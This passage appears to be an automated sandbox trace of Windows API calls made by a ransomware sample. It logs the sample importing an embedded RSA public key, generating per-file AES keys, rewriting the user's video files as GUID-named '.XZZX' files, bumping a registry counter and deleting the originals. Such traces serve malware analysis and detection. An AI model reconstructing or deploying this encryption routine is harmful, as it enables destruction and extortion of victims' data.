lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x420f860*, lpNumberOfBytesWritten=0x420e438*=0x1e, lpOverlapped=0x0) returned 1 [0129.693] SetFilePointer (in: hFile=0x67c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x244e [0129.693] WriteFile (in: hFile=0x67c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0129.693] SetFilePointer (in: hFile=0x67c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x2453 [0129.693] SetErrorMode (uMode=0x1) returned 0x1 [0129.693] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0129.693] OutputDebugStringW (lpOutputString="end") [0129.694] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----và\x83Ê\x03`Õ \x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0129.694] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x420dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8 | out: pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8) returned 1 [0129.694] CryptAcquireContextW (in: phProv=0x420d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x420d3e4*=0x3d1f888) returned 1 [0129.694] CryptImportPublicKeyInfo (in: hCryptProv=0x3d1f888, dwCertEncodingType=0x1, pInfo=0x3d0e7f8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3d0e828*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3d0e830*, PublicKey.cUnusedBits=0x0), phKey=0x420d3ec | out: phKey=0x420d3ec*=0x3cde6d8) returned 1 [0129.694] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0129.695] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0129.695] CryptEncrypt (in: hKey=0x3cde6d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x420d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x420d3f0*=0x80) returned 1 [0129.695] CryptEncrypt (in: hKey=0x3cde6d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3d1f910*, pdwDataLen=0x420d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3d1f910*, pdwDataLen=0x420d3e8*=0x80) returned 1 [0129.695] WriteFile (in: hFile=0x67c, lpBuffer=0x3d1f910*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3d1f910*, lpNumberOfBytesWritten=0x420e438*=0x80, lpOverlapped=0x0) returned 1 [0129.695] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0129.695] WriteFile (in: hFile=0x67c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0129.695] GetUserNameW (in: lpBuffer=0x420e1f8, pcbBuffer=0x420dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x420dfe0) returned 1 [0129.695] wsprintfW (in: param_1=0x420dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0129.695] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe4 | out: phkResult=0x420dfe4*=0x680) returned 0x0 [0129.695] RegQueryValueExW (in: hKey=0x680, lpValueName="E1010314", lpReserved=0x0, lpType=0x420dfd8, lpData=0x420dfec, lpcbData=0x420dfdc*=0x4 | out: lpType=0x420dfd8*=0x4, lpData=0x420dfec*=0xac, lpcbData=0x420dfdc*=0x4) returned 0x0 [0129.695] RegCloseKey (hKey=0x680) returned 0x0 [0129.695] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe8 | out: phkResult=0x420dfe8*=0x680) returned 0x0 [0129.696] RegSetValueExW (in: hKey=0x680, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x420dfec*=0xad, cbData=0x4 | out: lpData=0x420dfec*=0xad) returned 0x0 [0129.696] RegCloseKey (hKey=0x680) returned 0x0 [0129.696] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.696] VirtualFree (lpAddress=0x40e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.696] CloseHandle (hObject=0x67c) returned 1 [0129.697] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0129.697] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0129.697] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2 mjBTvZEWz.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\2 mjbtvzewz.swf")) returned 1 [0129.698] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2 mjBTvZEWz.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\2 mjbtvzewz.swf")) returned 0 Thread: id = 437 os_tid = 0x9e8 [0129.699] lstrcpyA (in: lpString1=0x434fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0129.699] lstrcpyW (in: lpString1=0x434f460, lpString2="92y tDp.avi" | out: lpString1="92y tDp.avi") returned="92y tDp.avi" [0129.699] lstrcpyW (in: lpString1=0x434e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\" [0129.699] SetErrorMode (uMode=0x1) returned 0x1 [0129.699] lstrcpyW (in: lpString1=0x434f860, lpString2="92y tDp.avi" | out: lpString1="92y tDp.avi") returned="92y tDp.avi" [0129.699] CoCreateGuid (in: pguid=0x434e440 | out: pguid=0x434e440*(Data1=0x6181b814, Data2=0xeb0d, Data3=0x4733, Data4=([0]=0x91, [1]=0x11, [2]=0x56, [3]=0x43, [4]=0xa4, [5]=0x88, [6]=0xa9, [7]=0xea))) returned 0x0 [0129.699] wsprintfW (in: param_1=0x434ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\92y tDp.avi") returned 71 [0129.699] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x434fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0129.699] wsprintfW (in: param_1=0x434e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\0790B504415F6E976181B814459452DF.XZZX") returned 96 [0129.699] StrStrW (lpFirst="92y tDp.avi", lpSrch="XZZX") returned 0x0 [0129.699] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\92y tDp.avi", dwFileAttributes=0x20) returned 1 [0129.700] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\92y tDp.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\92y tdp.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x670 [0129.700] ReadFile (in: hFile=0x670, lpBuffer=0x4362048, nNumberOfBytesToRead=0x67b4, lpNumberOfBytesRead=0x434e418, lpOverlapped=0x0 | out: lpBuffer=0x4362048*, lpNumberOfBytesRead=0x434e418*=0x67b4, lpOverlapped=0x0) returned 1 [0129.701] CloseHandle (hObject=0x670) returned 1 [0129.701] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0129.702] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40a0000 [0129.702] SetErrorMode (uMode=0x1) returned 0x1 [0129.702] lstrcpyW (in: lpString1=0x434e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0129.702] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3d1f998) returned 1 [0129.705] CryptGenKey (in: hProv=0x3d1f998, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3cde658) returned 1 [0129.839] CryptExportKey (in: hKey=0x3cde658, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x434e41c | out: pbData=0x0*, pdwDataLen=0x434e41c*=0x94) returned 1 [0129.839] CryptExportKey (in: hKey=0x3cde658, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40a0000, pdwDataLen=0x434e41c | out: pbData=0x40a0000*, pdwDataLen=0x434e41c*=0x94) returned 1 [0129.839] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0129.839] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0129.839] CryptDestroyKey (hKey=0x3cde658) returned 1 [0129.839] CryptReleaseContext (hProv=0x3d1f998, dwFlags=0x0) returned 1 [0129.839] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\0790B504415F6E976181B814459452DF.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\0790b504415f6e976181b814459452df.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x670 [0129.840] WriteFile (in: hFile=0x670, lpBuffer=0x4362048*, nNumberOfBytesToWrite=0x67b4, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x4362048*, lpNumberOfBytesWritten=0x434e438*=0x67b4, lpOverlapped=0x0) returned 1 [0129.841] SetFilePointer (in: hFile=0x670, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x67b4 [0129.841] WriteFile (in: hFile=0x670, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0129.841] SetFilePointer (in: hFile=0x670, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x67b9 [0129.841] WriteFile (in: hFile=0x670, lpBuffer=0x434f860*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x434f860*, lpNumberOfBytesWritten=0x434e438*=0x18, lpOverlapped=0x0) returned 1 [0129.841] SetFilePointer (in: hFile=0x670, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x67d1 [0129.841] WriteFile (in: hFile=0x670, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0129.841] SetFilePointer (in: hFile=0x670, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x67d6 [0129.841] SetErrorMode (uMode=0x1) returned 0x1 [0129.841] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0129.841] OutputDebugStringW (lpOutputString="end") [0129.841] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----và\x83Ê\x03`Õ4\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0129.841] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x434dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8 | out: pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8) returned 1 [0129.842] CryptAcquireContextW (in: phProv=0x434d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x434d3e4*=0x3d1f998) returned 1 [0129.842] CryptImportPublicKeyInfo (in: hCryptProv=0x3d1f998, dwCertEncodingType=0x1, pInfo=0x3d0e8c8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3d0e8f8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3d0e900*, PublicKey.cUnusedBits=0x0), phKey=0x434d3ec | out: phKey=0x434d3ec*=0x3cde718) returned 1 [0129.842] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0129.843] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0129.843] CryptEncrypt (in: hKey=0x3cde718, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x434d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x434d3f0*=0x80) returned 1 [0129.843] CryptEncrypt (in: hKey=0x3cde718, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3d1fa20*, pdwDataLen=0x434d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3d1fa20*, pdwDataLen=0x434d3e8*=0x80) returned 1 [0129.843] WriteFile (in: hFile=0x670, lpBuffer=0x3d1fa20*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x3d1fa20*, lpNumberOfBytesWritten=0x434e438*=0x80, lpOverlapped=0x0) returned 1 [0129.843] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0129.843] WriteFile (in: hFile=0x670, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0129.843] GetUserNameW (in: lpBuffer=0x434e1f8, pcbBuffer=0x434dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x434dfe0) returned 1 [0129.843] wsprintfW (in: param_1=0x434dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0129.843] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe4 | out: phkResult=0x434dfe4*=0x680) returned 0x0 [0129.843] RegQueryValueExW (in: hKey=0x680, lpValueName="E1010314", lpReserved=0x0, lpType=0x434dfd8, lpData=0x434dfec, lpcbData=0x434dfdc*=0x4 | out: lpType=0x434dfd8*=0x4, lpData=0x434dfec*=0xad, lpcbData=0x434dfdc*=0x4) returned 0x0 [0129.843] RegCloseKey (hKey=0x680) returned 0x0 [0129.844] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe8 | out: phkResult=0x434dfe8*=0x680) returned 0x0 [0129.844] RegSetValueExW (in: hKey=0x680, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x434dfec*=0xae, cbData=0x4 | out: lpData=0x434dfec*=0xae) returned 0x0 [0129.844] RegCloseKey (hKey=0x680) returned 0x0 [0129.844] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.844] VirtualFree (lpAddress=0x40a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.844] CloseHandle (hObject=0x670) returned 1 [0129.845] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0129.846] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0129.846] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\92y tDp.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\92y tdp.avi")) returned 1 [0129.847] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\92y tDp.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\92y tdp.avi")) returned 0 Thread: id = 438 os_tid = 0x9ec [0129.849] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0129.849] lstrcpyW (in: lpString1=0x420f460, lpString2="ArnUUg6o.mkv" | out: lpString1="ArnUUg6o.mkv") returned="ArnUUg6o.mkv" [0129.849] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\" [0129.849] SetErrorMode (uMode=0x1) returned 0x1 [0129.849] lstrcpyW (in: lpString1=0x420f860, lpString2="ArnUUg6o.mkv" | out: lpString1="ArnUUg6o.mkv") returned="ArnUUg6o.mkv" [0129.849] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x5d033a6e, Data2=0x907b, Data3=0x4a1d, Data4=([0]=0xb2, [1]=0xc3, [2]=0xf8, [3]=0x78, [4]=0x94, [5]=0xac, [6]=0x94, [7]=0xf8))) returned 0x0 [0129.849] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\ArnUUg6o.mkv") returned 71 [0129.849] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0129.849] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\816AF2DA29D3EBEF5D033A6E2DF4D037.XZZX") returned 96 [0129.849] StrStrW (lpFirst="ArnUUg6o.mkv", lpSrch="XZZX") returned 0x0 [0129.849] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\ArnUUg6o.mkv", dwFileAttributes=0x20) returned 1 [0129.852] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\ArnUUg6o.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\arnuug6o.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x67c [0129.852] ReadFile (in: hFile=0x67c, lpBuffer=0x4362048, nNumberOfBytesToRead=0x397b, lpNumberOfBytesRead=0x420e418, lpOverlapped=0x0 | out: lpBuffer=0x4362048*, lpNumberOfBytesRead=0x420e418*=0x397b, lpOverlapped=0x0) returned 1 [0129.853] CloseHandle (hObject=0x67c) returned 1 [0129.853] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0129.854] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40e0000 [0129.854] SetErrorMode (uMode=0x1) returned 0x1 [0129.854] lstrcpyW (in: lpString1=0x420e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0129.854] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3d1faa8) returned 1 [0129.857] CryptGenKey (in: hProv=0x3d1faa8, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3cde658) returned 1 [0129.951] CryptExportKey (in: hKey=0x3cde658, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x420e41c | out: pbData=0x0*, pdwDataLen=0x420e41c*=0x94) returned 1 [0129.951] CryptExportKey (in: hKey=0x3cde658, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40e0000, pdwDataLen=0x420e41c | out: pbData=0x40e0000*, pdwDataLen=0x420e41c*=0x94) returned 1 [0129.951] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0129.952] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0129.952] CryptDestroyKey (hKey=0x3cde658) returned 1 [0129.952] CryptReleaseContext (hProv=0x3d1faa8, dwFlags=0x0) returned 1 [0129.952] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\816AF2DA29D3EBEF5D033A6E2DF4D037.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\816af2da29d3ebef5d033a6e2df4d037.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x67c [0129.952] WriteFile (in: hFile=0x67c, lpBuffer=0x4362048*, nNumberOfBytesToWrite=0x397b, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x4362048*, lpNumberOfBytesWritten=0x420e438*=0x397b, lpOverlapped=0x0) returned 1 [0129.953] SetFilePointer (in: hFile=0x67c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, 